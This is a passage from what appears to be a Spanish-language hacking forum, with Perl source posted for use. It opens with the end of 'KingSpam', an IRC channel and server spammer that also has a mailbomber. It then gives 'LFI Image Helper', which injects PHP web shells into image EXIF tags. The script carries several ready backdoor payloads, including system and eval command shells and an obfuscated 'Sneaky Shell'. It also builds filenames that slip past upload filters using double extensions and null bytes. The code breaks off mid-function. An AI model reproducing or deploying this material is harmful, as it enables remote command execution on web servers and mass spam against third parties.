  718.    cprint( "\x036" . $_[0] . "\x030" );
  719.    return "";
  720. }
  721.  
  722. sub printear_logo {
  723.    cprint( "\x037" . $_[0] . "\x030" );
  724.    return ""
  725.  
  726. }
  727.  
  728. sub printear_titulo {
  729.    cprint( "\x0310" . $_[0] . "\x030" );
  730.    return "";
  731. }
  732.  
  733. sub savefile {
  734.    open( SAVE, ">>" . $_[0] );
  735.    print SAVE $_[1] . "\n";
  736.    close SAVE;
  737. }
  738.  
  739. sub loadfile {
  740.    if ( -f $_[0] ) {
  741.        my @words;
  742.        my @r;
  743.        open( FILE, $_[0] );
  744.        @words = <FILE>;
  745.        close FILE;
  746.        for (@words) {
  747.            push( @r, $_ );
  748.        }
  749.        return (@r);
  750.    }
  751.    else {
  752.        printear("\n[-] File not found\n\n");
  753.        copyright();
  754.    }
  755. }
  756.  
  757. sub sintax {
  758.    printear("[+] Sintax : ");
  759.    print "perl $0 <option> <value>\n";
  760.    printear("\n[+] Options : \n\n");
  761.    print
  762. "-get_channels <host> -port <port> -nick <nick> -savefile <file> : Get & Save Channels of a server\n";
  763.    print
  764. "-get_users <host> -port <port> -channel <channel> -nick <nick> -savefile <file> : Get & Save Channels of a server\n";
  765.    print
  766. "-spam_channel <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel\n";
  767.    print
  768. "-spam_channel_forever <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel Forever\n";
  769.    print
  770. "-spam_server <host> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a server\n";
  771.    print
  772. "-spam_servers_list <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in multiple servers\n";
  773.    print
  774. "-spam_targets <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in servers & channels saved\n";
  775.    print "-mailbomber : Open MailBomber\n";
  776.    printear("\n[+] Example : \n\n");
  777.    print "perl kingspam.pl -get_channels localhost\n";
  778.    print "perl kingspam.pl -get_users localhost -channel #locos\n";
  779.    print
  780. "perl kingspam.pl -spam_channel localhost -channel #locos -spam_file c:/spam.txt\n";
  781.    print
  782. "perl kingspam.pl -spam_channel_forever localhost -channel #locos -spam_file c:/spam.txt\n";
  783.    print "perl kingspam.pl -spam_server localhost -spam_file c:/spam.txt\n";
  784.    print
  785. "perl kingspam.pl -spam_servers_file c:/servers.txt -nick ClapTrap -spam_file c:/spam.txt\n";
  786.    print
  787.      "perl kingspam.pl -spam_targets c:/servers.txt -spam_file c:/spam.txt\n";
  788.    print "perl kingspam.pl -mailbomber\n";
  789. }
  790.  
  791. sub head {
  792.    printear_logo("\n-- == KingSpam 1.0 == --\n\n\n");
  793. }
  794.  
  795. sub copyright {
  796.    printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n");
  797.    exit(1);
  798. }
  799.  
  800. # The End ?
  801.  

Un video con ejemplos de uso :



Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.
8  Programación / Scripting / [Perl] LFI Image Helper 0.8 en: 8 Mayo 2015, 15:57
Un simple script en Perl para colocar codigo de phpshells en imagenes , el script tiene las siguientes opciones :

  • Listar todos los Tags de la imagen con contenido
  • Listar solo los Tags
  • Leer el valor de cierto Tag
  • Crear un Tag nuevo
  • Editar un Tag
  • Borrar un Tag
  • Infectar una imagen con un backdoor conocido en PHP

El codigo :

Código
  1. #!usr/bin/perl
  2. #LFI Image Helper 0.8
  3. #(C) Doddy Hackman 2015
  4. #ppm install  http://trouchelle.com/ppm/Image-ExifTool.ppd
  5. #
  6. #Array @shells based on : OhNo - Evil Image Builder By Hood3dRob1n
  7. #Thanks to Hood3dRob1n
  8. #
  9. #Dump Values
  10. #Based on :http://www.nntp.perl.org/group/perl.beginners/2012/02/msg119913.html
  11. #Thanks to Ken Slater
  12. #
  13. use Image::ExifTool;
  14. use Getopt::Long;
  15. use Color::Output;
  16. Color::Output::Init;
  17.  
  18. my @shells = (
  19.  
  20.    {},
  21.  
  22.    {
  23.  
  24.        "nombre"  => "Simple Backdoor",
  25.        "codigo"  => '<?php system($_GET["cmd"]);exit(1); ?>',
  26.        "ejemplo" => "?cmd="
  27.  
  28.    },
  29.    {
  30.  
  31.        "nombre" => "System Shell",
  32.        "codigo" =>
  33. '<?error_reporting(0);print(___);system($_REQUEST[cmd]);print(___);die;?>',
  34.        "ejemplo" => "?cmd="
  35.  
  36.    },
  37.    {
  38.  
  39.        "nombre" => "Eval Shell",
  40.        "codigo" =>
  41. '<?error_reporting(0);print(___);eval($_REQUEST[cmd]);print(___);die;?>',
  42.        "ejemplo" => "?cmd="
  43.  
  44.    },
  45.    {
  46.  
  47.        "nombre" => "Sneaky Shell",
  48.        "codigo" =>
  49. '<?php @$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_; $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; $_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_] );?>',
  50.        "ejemplo" => "?0="
  51.  
  52.    },
  53.    {
  54.  
  55.        "nombre" => "r0ng Shell",
  56.        "codigo" =>
  57.          '<?if($_GET["r0ng"]){echo"<pre>".shell_exec($_GET["r0ng"]);}?>',
  58.        "ejemplo" => "?r0ng="
  59.  
  60.    }
  61.  
  62. );
  63.  
  64. GetOptions(
  65.    "dump_all=s"   => \$dump_all,
  66.    "dump_tags=s"  => \$dump_tags,
  67.    "read_tag=s"   => \$read_tag,
  68.    "tag=s"        => \$tag,
  69.    "make_tag=s"   => \$make_tag,
  70.    "value=s"      => \$value,
  71.    "update_tag=s" => \$update_tag,
  72.    "delete_tag=s" => \$delete_tag,
  73.    "backdoor=s"   => \$backdoor,
  74.    "bypass=s"     => \$bypass,
  75.    "file=s"       => \$file
  76. );
  77.  
  78. head();
  79.  
  80. if ($dump_all) {
  81.  
  82.    if ( -f $dump_all ) {
  83.        printear_titulo("[+] Finding information in : ");
  84.        print $dump_all. "\n\n";
  85.        dump_all($dump_all);
  86.    }
  87.    else {
  88.        printear("[-] File not found\n");
  89.    }
  90.  
  91. }
  92. elsif ($dump_tags) {
  93.  
  94.    if ( -f $dump_tags ) {
  95.        printear_titulo("[+] Finding tags in : ");
  96.        print $dump_tags. "\n\n";
  97.        dump_tags($dump_tags);
  98.    }
  99.    else {
  100.        printear("[-] File not found\n");
  101.    }
  102. }
  103. elsif ($read_tag) {
  104.  
  105.    if ( -f $read_tag ) {
  106.        printear_titulo("[+] Finding tag value of $tag in : ");
  107.        print $read_tag. "\n\n";
  108.        read_tag( $read_tag, $tag );
  109.    }
  110.    else {
  111.        printear("[-] File not found\n");
  112.    }
  113.  
  114. }
  115.  
  116. elsif ($make_tag) {
  117.  
  118.    if ( -f $make_tag ) {
  119.  
  120.        printear_titulo("[+] Photo : ");
  121.        print $make_tag. "\n";
  122.        printear_titulo("[+] Name : ");
  123.        print $tag. "\n";
  124.        printear_titulo("[+] Value : ");
  125.        print $value. "\n\n";
  126.  
  127.        printear("[+] Making tag $tag ...\n\n");
  128.  
  129.        make_tag( $make_tag, $tag, $value );
  130.  
  131.    }
  132.    else {
  133.        printear("[-] File not found\n");
  134.    }
  135. }
  136. elsif ($update_tag) {
  137.  
  138.    if ( -f $update_tag ) {
  139.  
  140.        printear_titulo("[+] Photo : ");
  141.        print $update_tag. "\n";
  142.        printear_titulo("[+] Name : ");
  143.        print $tag. "\n";
  144.        printear_titulo("[+] Value : ");
  145.        print $value. "\n\n";
  146.  
  147.        printear("[+] Updating tag $tag ...\n\n");
  148.  
  149.        update_tag( $update_tag, $tag, $value );
  150.  
  151.    }
  152.    else {
  153.        printear("[-] File not found\n");
  154.    }
  155. }
  156. elsif ($delete_tag) {
  157.  
  158.    if ( -f $delete_tag ) {
  159.        printear_titulo("[+] Deleting tag $tag in : ");
  160.        print $delete_tag. "\n\n";
  161.        delete_tag( $delete_tag, $tag );
  162.    }
  163.    else {
  164.        printear("[-] File not found\n");
  165.    }
  166.  
  167. }
  168. elsif ($backdoor) {
  169.  
  170.    if ( -f $backdoor ) {
  171.  
  172.        printear_titulo("[+] Photo : ");
  173.        print $backdoor. "\n\n";
  174.  
  175.        printear("[+] 1 : ");
  176.        print "Simple Backdoor\n";
  177.        printear("[+] 2 : ");
  178.        print "System Shell\n";
  179.        printear("[+] 3 : ");
  180.        print "Eval Shell\n";
  181.        printear("[+] 4 : ");
  182.        print "Sneaky Shell\n";
  183.        printear("[+] 5 : ");
  184.        print "r0ng Shell\n";
  185.  
  186.        printear_titulo("\n[+] Option : ");
  187.        chomp( my $opcion = <stdin> );
  188.  
  189.        backdoor_tag( $backdoor, $opcion, $file );
  190.  
  191.    }
  192.    else {
  193.        printear("[-] File not found\n");
  194.    }
  195.  
  196. }
  197. elsif ($bypass) {
  198.  
  199.    if ( -f $bypass ) {
  200.  
  201.        my $source = readfile($bypass);
  202.  
  203.        printear_titulo("[+] PHP Shell : ");
  204.        print $bypass. "\n\n";
  205.  
  206.        printear("[+] 1 : ");
  207.        print "bypass.jpg.php\n";
  208.        printear("[+] 2 : ");
  209.        print "bypass.php;test.jpg\n";
  210.        printear("[+] 3 : ");
  211.        print "bypass.php%00.jpg\n";
  212.  
  213.        printear_titulo("\n[+] Option : ");
  214.        chomp( my $opcion = <stdin> );
  215.  
  216.        if ( $opcion eq "1" ) {
  217.            savefile( $file . ".jpg.php", $source );
  218.            chmod 0777, $file . ".jpg.php";
  219.        }
  220.        elsif ( $opcion eq "2" ) {
  221.            savefile( $file . ".php;test.jpg", $source );
  222.            chmod 0777, $file . ".php;test.jpg";
  223.        }
  224.        elsif ( $opcion eq "3" ) {
  225.            savefile(